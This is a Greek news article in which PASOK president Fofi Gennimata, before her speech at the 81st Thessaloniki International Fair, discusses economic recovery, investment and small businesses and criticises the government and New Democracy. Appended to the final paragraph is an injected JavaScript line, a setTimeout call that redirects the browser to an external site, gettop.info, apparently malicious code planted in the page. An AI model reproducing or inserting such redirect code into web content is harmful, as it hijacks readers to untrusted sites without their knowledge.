Γεννηματά: Εμείς ξέρουμε και επειδή πάθαμε, μάθαμε

0
4

 

Μιλώντας σε  εκπροσώπους παραγωγικών τάξεων και κοινωνικών φορέων, κατά τη διάρκεια συνάντησης που είχε μαζί τους, λίγες ώρες πριν από την ομιλία της, στην 81η ΔΕΘ, η πρόεδρος του ΠΑΣΟΚ διαβεβαίωσε ότι το Κίνημα ξέρει με ποιο τρόπο θα επιστρέψει σε θετικούς ρυθμούς ανάπτυξης η οικονομία και θα βγει η χώρα από την κρίση, επειδή «έπαθε και έμαθε».

«Εμείς ξέρουμε και επειδή πάθαμε, μάθαμε», επεσήμανε η κ. Γεννηματά, η οποία, δίνοντας το στίγμα των σημείων που θα αναπτύξει στην ομιλία της, είπε ότι η Ελλάδα δεν έχει άλλα περιθώρια «να βλέπει τα τρένα της ανάπτυξης και των ευκαιριών να περνούν και να χάνονται». «Χρειαζόμαστε σταθερή κυβέρνηση που μπορεί να πείσει τους εταίρους ότι και τολμηρές μεταρρυθμίσεις στο κράτος και στην κοινωνία μπορεί να κάνει, βάσει συγκεκριμένου σχεδίου», πρόσθεσε.

Μαζί με την κ. Γεννηματά ήταν ο πρόεδρος της ΔΗΜΑΡ, Θανάσης Θεοχαρόπουλος, ενώ στη συνάντηση συμμετείχαν βουλευτές, τοπικά στελέχη των δύο κομμάτων και εκπρόσωποι των κινήσεων πολιτών για τη σοσιαλδημοκρατία.

Όπως σημείωσε η κ. Γεννηματά, «η χώρα χρειάζεται ένα αναπτυξιακό σοκ, με προσέλκυση μεγάλων επενδύσεων και με συνέχιση των αποκρατικοποιήσεων», ενώ υπογράμμισε ότι το βασικότερο είναι να μπορέσουν να επιβιώσουν και να αναπτυχθούν περαιτέρω οι μικρομεσαίες επιχειρήσεις, τις οποίες χαρακτήρισε «ραχοκοκαλιά της οικονομίας».

Επίσης, ανέφερε ότι αυτήν τη στιγμή η χώρα χρειάζεται ενότητα όλων των παραγωγικών δυνάμεων και αλλαγή πολιτικών συσχετισμών, ενώ επέκρινε την κυβέρνηση, λέγοντας ότι δεν μπορεί, σε καμία περίπτωση, να ενεργοποιήσει τους στόχους και τις συμφωνίες με τους δανειστές. «Η κυβέρνηση βρίσκεται αντιμέτωπη με τα capital controls, με την αδυναμία των τραπεζών να χρηματοδοτήσουν υγιείς επιχειρήσεις και με το πολύ χαμηλό επενδυτικό κλίμα εμπιστοσύνης που υπάρχει στις διεθνείς αγορές», τόνισε η πρόεδρος του ΠΑΣΟΚ, ενώ κατηγόρησε και τη ΝΔ, λέγοντας πως «πιστεύει ότι την ανάπτυξη στη χώρα θα φέρουν μόνο οι μεγάλες επιχειρήσεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here